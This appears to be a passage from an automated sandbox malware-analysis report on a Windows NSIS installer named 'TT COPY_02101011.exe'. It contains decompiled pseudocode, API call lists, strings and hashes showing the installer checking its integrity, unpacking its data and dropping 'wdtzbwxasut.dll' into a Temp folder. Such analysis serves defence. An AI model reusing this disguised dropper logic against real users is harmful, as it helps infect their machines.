                                                						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t75 =  *(_t80 + 0x48);
                                                					if(_t75 == 0) {
                                                						goto L16;
                                                					}
                                                					_t59 =  *0x42eb98; // 0x575ac0
                                                					_t78 = 0x42db00;
                                                					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
                                                					_t61 =  *0x42db00; // 0x74
                                                					if(_t61 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t61 == 0x22) {
                                                						_t78 = 0x42db01;
                                                						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
                                                					}
                                                					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                                						L15:
                                                						E0040592B(_t84, E0040541E(_t78));
                                                						goto L16;
                                                					} else {
                                                						_t67 = GetFileAttributesA(_t78);
                                                						if(_t67 == 0xffffffff) {
                                                							L14:
                                                							E00405465(_t78);
                                                							goto L15;
                                                						}
                                                						_t95 = _t67 & 0x00000010;
                                                						if((_t67 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}


                                                APIs
                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                                • lstrlenA.KERNEL32(tduolivt,?,?,?,tduolivt,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\TT COPY_02101011.exe" ), ref: 00403565
                                                • lstrcmpiA.KERNEL32(?,.exe,tduolivt,?,?,?,tduolivt,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                                • GetFileAttributesA.KERNEL32(tduolivt), ref: 00403583
                                                • LoadImageA.USER32 ref: 004035CC
                                                  • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                • RegisterClassA.USER32 ref: 00403613
                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                                • CreateWindowExA.USER32 ref: 00403664
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                                • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                                • GetClassInfoA.USER32 ref: 004036C2
                                                • GetClassInfoA.USER32 ref: 004036CF
                                                • RegisterClassA.USER32 ref: 004036D8
                                                • DialogBoxParamA.USER32 ref: 004036F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$tduolivt
                                                • API String ID: 914957316-895661971
                                                • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                                • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E00402C0B(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				signed int _t50;
                                                				void* _t53;
                                                				signed int _t54;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				signed int _t90;
                                                				signed int _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = "C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe";
                                                				 *0x42eb6c = _t43 + 0x3e8;
                                                				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe", 0x400);
                                                				_t89 = E00405602(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x409010 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return "Error launching installer";
                                                				}
                                                				_t92 = "C:\\Users\\jones\\Desktop";
                                                				E0040592B("C:\\Users\\jones\\Desktop", _t91);
                                                				E0040592B(0x436000, E00405465(_t92));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				__eflags = _t50;
                                                				 *0x428b88 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00402BB0(1);
                                                					__eflags =  *0x42eb74 - _t82; // 0x8200
                                                					if(__eflags == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v8 - _t82;
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                						_t94 = _t53;
                                                						_t54 =  *0x42eb74; // 0x8200
                                                						E00403098(_t54 + 0x1c);
                                                						_push(_v24);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff);
                                                						_t57 = E00402E44();
                                                						__eflags = _t57 - _v24;
                                                						if(_t57 == _v24) {
                                                							__eflags = _v44 & 0x00000001;
                                                							 *0x42eb70 = _t94;
                                                							 *0x42eb78 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x42eb7c =  *0x42eb7c + 1;
                                                								__eflags =  *0x42eb7c;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                								__eflags = _t85;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E004055C3(0x42eb80, _t94 + 4, 0x40);
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E00403098( *0x414b78);
                                                					_t65 = E00403066( &_a4, 4); // executed
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v12 - _a4;
                                                					if(_v12 != _a4) {
                                                						goto L29;
                                                					}
                                                					goto L28;
                                                				} else {
                                                					do {
                                                						_t67 =  *0x42eb74; // 0x8200
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                						__eflags = _t93 - _t70;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						_t71 = E00403066(0x420b88, _t90); // executed
                                                						__eflags = _t71;
                                                						if(_t71 == 0) {
                                                							E00402BB0(1);
                                                							L29:
                                                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						__eflags =  *0x42eb74;
                                                						if( *0x42eb74 != 0) {
                                                							__eflags = _a4 & 0x00000002;
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00402BB0(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E004055C3( &_v44, 0x420b88, 0x1c);
                                                						_t77 = _v44;
                                                						__eflags = _t77 & 0xfffffff0;
                                                						if((_t77 & 0xfffffff0) != 0) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v40 - 0xdeadbeef;
                                                						if(_v40 != 0xdeadbeef) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v28 - 0x74736e49;
                                                						if(_v28 != 0x74736e49) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v32 - 0x74666f73;
                                                						if(_v32 != 0x74666f73) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v36 - 0x6c6c754e;
                                                						if(_v36 != 0x6c6c754e) {
                                                							goto L20;
                                                						}
                                                						_a4 = _a4 | _t77;
                                                						_t87 =  *0x414b78; // 0x4b8ef
                                                						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
                                                						_t80 = _v20;
                                                						__eflags = _t80 - _t93;
                                                						 *0x42eb74 = _t87;
                                                						if(_t80 > _t93) {
                                                							goto L29;
                                                						}
                                                						__eflags = _a4 & 0x00000008;
                                                						if((_a4 & 0x00000008) != 0) {
                                                							L16:
                                                							_v8 = _v8 + 1;
                                                							_t24 = _t80 - 4; // 0x409154
                                                							_t93 = _t24;
                                                							__eflags = _t90 - _t93;
                                                							if(_t90 > _t93) {
                                                								_t90 = _t93;
                                                							}
                                                							goto L20;
                                                						}
                                                						__eflags = _a4 & 0x00000004;
                                                						if((_a4 & 0x00000004) != 0) {
                                                							break;
                                                						}
                                                						goto L16;
                                                						L20:
                                                						__eflags = _t93 -  *0x428b88; // 0x4b8f3
                                                						if(__eflags < 0) {
                                                							_v12 = E00405CB5(_v12, 0x420b88, _t90);
                                                						}
                                                						 *0x414b78 =  *0x414b78 + _t90;
                                                						_t93 = _t93 - _t90;
                                                						__eflags = _t93;
                                                					} while (_t93 > 0);
                                                					_t82 = 0;
                                                					__eflags = 0;
                                                					goto L24;
                                                				}
                                                			}


































                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402C1C
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TT COPY_02101011.exe,00000400), ref: 00402C38
                                                  • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00405606
                                                  • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT COPY_02101011.exe,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00402C84
                                                Strings
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                                                • Inst, xrefs: 00402CF0
                                                • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                                                • Null, xrefs: 00402D02
                                                • C:\Users\user\Desktop\TT COPY_02101011.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                                                • "C:\Users\user\Desktop\TT COPY_02101011.exe" , xrefs: 00402C15
                                                • Error launching installer, xrefs: 00402C5B
                                                • soft, xrefs: 00402CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TT COPY_02101011.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                • API String ID: 4283519449-773316782
                                                • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                                • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00401734(FILETIME* __ebx, void* __eflags) {
                                                				void* _t33;
                                                				void* _t41;
                                                				void* _t43;
                                                				FILETIME* _t49;
                                                				FILETIME* _t62;
                                                				void* _t64;
                                                				signed int _t70;
                                                				FILETIME* _t71;
                                                				FILETIME* _t75;
                                                				signed int _t77;
                                                				void* _t80;
                                                				CHAR* _t82;
                                                				void* _t85;
                                                
                                                				_t75 = __ebx;
                                                				_t82 = E004029E8(0x31);
                                                				 *(_t85 - 8) = _t82;
                                                				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                				_t33 = E0040548B(_t82);
                                                				_push(_t82);
                                                				if(_t33 == 0) {
                                                					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                				} else {
                                                					_push(0x409b78);
                                                					E0040592B();
                                                				}
                                                				E00405B89(0x409b78);
                                                				while(1) {
                                                					__eflags =  *(_t85 + 8) - 3;
                                                					if( *(_t85 + 8) >= 3) {
                                                						_t64 = E00405C22(0x409b78);
                                                						_t77 = 0;
                                                						__eflags = _t64 - _t75;
                                                						if(_t64 != _t75) {
                                                							_t71 = _t64 + 0x14;
                                                							__eflags = _t71;
                                                							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                						__eflags = _t70;
                                                						 *(_t85 + 8) = _t70;
                                                					}
                                                					__eflags =  *(_t85 + 8) - _t75;
                                                					if( *(_t85 + 8) == _t75) {
                                                						E004055E3(0x409b78);
                                                					}
                                                					__eflags =  *(_t85 + 8) - 1;
                                                					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                					__eflags = _t41 - 0xffffffff;
                                                					 *(_t85 - 0x34) = _t41;
                                                					if(_t41 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t85 + 8) - _t75;
                                                					if( *(_t85 + 8) != _t75) {
                                                						E00404CC9(0xffffffe2,  *(_t85 - 8));
                                                						__eflags =  *(_t85 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
                                                						__eflags =  *0x42ebe8;
                                                						goto L32;
                                                					} else {
                                                						E0040592B(0x40a378, 0x42f000);
                                                						E0040592B(0x42f000, 0x409b78);
                                                						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\jones\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                						E0040592B(0x42f000, 0x40a378);
                                                						_t62 = E004051EC("C:\Users\jones\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                						__eflags = _t62;
                                                						if(_t62 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t62 == 1;
                                                							if(_t62 == 1) {
                                                								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
                                                								L32:
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(0x409b78);
                                                								_push(0xfffffffa);
                                                								E00404CC9();
                                                								L29:
                                                								_t49 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t49;
                                                				}
                                                				E00404CC9(0xffffffea,  *(_t85 - 8));
                                                				 *0x42ec14 =  *0x42ec14 + 1;
                                                				_push(_t75);
                                                				_push(_t75);
                                                				_push( *(_t85 - 0x34));
                                                				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                                				_t43 = E00402E44(); // executed
                                                				 *0x42ec14 =  *0x42ec14 - 1;
                                                				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                				_t80 = _t43;
                                                				if( *(_t85 - 0x18) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                                				__eflags = _t80 - _t75;
                                                				if(_t80 >= _t75) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t80 - 0xfffffffe;
                                                					if(_t80 != 0xfffffffe) {
                                                						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
                                                					} else {
                                                						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
                                                						lstrcatA(0x409b78,  *(_t85 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(0x409b78);
                                                					E004051EC();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}

                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,tduolivt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                • CompareFileTime.KERNEL32(-00000014,?,tduolivt,tduolivt,00000000,00000000,tduolivt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                  • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,pewdd Setup,NSIS Error), ref: 00405938
                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                  • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F4C3,73BCEA30), ref: 00404D25
                                                  • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nshA78C.tmp$C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll$tduolivt
                                                • API String ID: 1941528284-846125281
                                                • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                                • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				long _v12;
                                                				void* _v16;
                                                				long _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				char _v92;
                                                				void* _t67;
                                                				void* _t68;
                                                				long _t74;
                                                				intOrPtr _t79;
                                                				long _t80;
                                                				void* _t82;
                                                				int _t84;
                                                				intOrPtr _t95;
                                                				void* _t97;
                                                				void* _t100;
                                                				long _t101;
                                                				signed int _t102;
                                                				long _t103;
                                                				int _t104;
                                                				intOrPtr _t105;
                                                				long _t106;
                                                				void* _t107;
                                                
                                                				_t102 = _a16;
                                                				_t97 = _a12;
                                                				_v12 = _t102;
                                                				if(_t97 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t97;
                                                				if(_t97 == 0) {
                                                					_v16 = 0x418b80;
                                                				}
                                                				_t65 = _a4;
                                                				if(_a4 >= 0) {
                                                					_t95 =  *0x42ebb8; // 0x9777
                                                					E00403098(_t95 + _t65);
                                                				}
                                                				_t67 = E00403066( &_a16, 4); // executed
                                                				if(_t67 == 0) {
                                                					L34:
                                                					_push(0xfffffffd);
                                                					goto L35;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t97 == 0) {
                                                							while(_a16 > 0) {
                                                								_t103 = _v12;
                                                								if(_a16 < _t103) {
                                                									_t103 = _a16;
                                                								}
                                                								if(E00403066(0x414b80, _t103) == 0) {
                                                									goto L34;
                                                								} else {
                                                									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                                										L29:
                                                										_push(0xfffffffe);
                                                										L35:
                                                										_pop(_t68);
                                                										return _t68;
                                                									} else {
                                                										_v8 = _v8 + _t103;
                                                										_a16 = _a16 - _t103;
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							L45:
                                                							return _v8;
                                                						}
                                                						if(_a16 < _t102) {
                                                							_t102 = _a16;
                                                						}
                                                						if(E00403066(_t97, _t102) != 0) {
                                                							_v8 = _t102;
                                                							goto L45;
                                                						} else {
                                                							goto L34;
                                                						}
                                                					}
                                                					_t74 = GetTickCount();
                                                					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
                                                					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t74;
                                                					 *0x40afc8 = 8;
                                                					 *0x414b70 = 0x40cb68;
                                                					 *0x414b6c = 0x40cb68;
                                                					 *0x414b68 = 0x414b68;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L45;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t104 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t104 = _a16;
                                                						}
                                                						if(E00403066(0x414b80, _t104) == 0) {
                                                							goto L34;
                                                						}
                                                						_a16 = _a16 - _t104;
                                                						 *0x40afb8 = 0x414b80;
                                                						 *0x40afbc = _t104;
                                                						while(1) {
                                                							_t100 = _v16;
                                                							 *0x40afc0 = _t100;
                                                							 *0x40afc4 = _v12;
                                                							_t79 = E00405D23("KsA");
                                                							_v28 = _t79;
                                                							if(_t79 < 0) {
                                                								break;
                                                							}
                                                							_t105 =  *0x40afc0; // 0x41f4c3
                                                							_t106 = _t105 - _t100;
                                                							_t80 = GetTickCount();
                                                							_t101 = _t80;
                                                							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t107 = _t107 + 0xc;
                                                								E00404CC9(0,  &_v92);
                                                								_v20 = _t101;
                                                							}
                                                							if(_t106 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L45;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t82 =  *0x40afc0; // 0x41f4c3
                                                									_v8 = _v8 + _t106;
                                                									_v12 = _v12 - _t106;
                                                									_v16 = _t82;
                                                									L24:
                                                									if(_v28 != 1) {
                                                										continue;
                                                									}
                                                									goto L45;
                                                								}
                                                								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                								if(_t84 == 0 || _v24 != _t106) {
                                                									goto L29;
                                                								} else {
                                                									_v8 = _v8 + _t106;
                                                									goto L24;
                                                								}
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L35;
                                                					}
                                                					goto L34;
                                                				}
                                                			}
                                                0x00402f3a
                                                0x00402f41
                                                0x00402f44
                                                0x00000000
                                                0x00000000
                                                0x00402f4a
                                                0x00402f50
                                                0x00402f52
                                                0x00402f5b
                                                0x00402f5d
                                                0x00402f8b
                                                0x00402f91
                                                0x00402f9a
                                                0x00402f9f
                                                0x00402f9f
                                                0x00402fa6
                                                0x00402fea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402fa8
                                                0x00402fab
                                                0x00402fcd
                                                0x00402fd2
                                                0x00402fd5
                                                0x00402fd8
                                                0x00402fdb
                                                0x00402fdf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402fe5
                                                0x00402fb9
                                                0x00402fc1
                                                0x00000000
                                                0x00402fc8
                                                0x00402fc8
                                                0x00000000
                                                0x00402fc8
                                                0x00402fc1
                                                0x00402fa6
                                                0x00402ff2
                                                0x00000000
                                                0x00402ff2
                                                0x00000000
                                                0x00402ef4

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EAB
                                                • GetTickCount.KERNEL32 ref: 00402F52
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                                • wsprintfA.USER32 ref: 00402F8B
                                                • WriteFile.KERNELBASE(00000000,00000000,0041F4C3,7FFFFFFF,00000000), ref: 00402FB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CountTick$FileWritewsprintf
                                                • String ID: ... %d%%$KsA
                                                • API String ID: 4209647438-1260645078
                                                • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                                • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
